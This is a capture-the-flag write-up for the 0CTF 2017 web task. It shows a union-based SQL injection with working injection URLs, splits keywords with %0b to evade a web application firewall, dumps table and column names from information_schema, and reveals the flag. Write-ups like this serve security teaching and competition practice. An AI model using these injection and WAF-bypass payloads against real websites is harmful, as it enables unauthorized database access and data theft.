Information

  • CTF Events : 0CTF 2017
  • Task : web
  • Hack : SQL Injection

The title gives us a hint about how to resolve this challenge : Sql Injection
When you connect to the website, you see a list of post :

Click on one of them and take a look at the URL :

http://202.120.7.203/index.php?id=1

The parameter id will help us do the sql injection.
With a simple test, you can check if it is injectable (id=1 and 1=1):

It seems to work. So let's try to get more information about the database :

http://202.120.7.203/index.php?id=1+UNION+SELECT+1,2,Group_Concat(TABLE_NAME)+from+INFORMATION_SCHEMA.TABLES

Result:

As you can see, there's a firewall (waf). So we need to bypass it.

There are many ways to bypass it. For example, for the parameter "union":

/*!UnIoN*/
Uni/**/on

Solution

1. Get table name

But these tricks won't help because mod_rewrite is on. So we need to find another way to bypass it.
For Mod_rewrite, Comments "/**/" cannot be bypassed. We use "%0b" which will replace "/**/".

It also needs to get 3 outputs, that's why I always return 1, group_concat(), 2
Let's try:

http://202.120.7.203/index.php?id=0+UN%0BION+S%0BELECT+1,2,GrOUp_COnCaT(TABLE_NAME)+fro%0Bm+INFORMATION_SCHEMA.TABLES--

It works! There's the table flag in the output :

CHARACTER_SETS,COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
...
...
...
INNODB_SYS_TABLESTATS,
flag,
news

2. Get flag columns name

I use the following command :

http://202.120.7.203/index.php?id=0+UN%0bION+S%0bELECT+1,GROUP_CONCAT(column_name),2+FR%0bOM+information_schema.columns+WH%0bERE+table_schema+=%27news%27+and+table_name+=0x666c6167--

The word "flag" need to be converted in hex (I used this tools) : 0x666c6167

Result :

flag

3. Get the flag

Easy step :

http://202.120.7.203/index.php?id=0+UN%0bION+S%0bELECT+0,GROUP_CONCAT(flag),2+FR%0bOM+flag

Result : flag{W4f_bY_paSS_f0R_CI}

Credits

https://unsplash.com/@ilyapavlov

References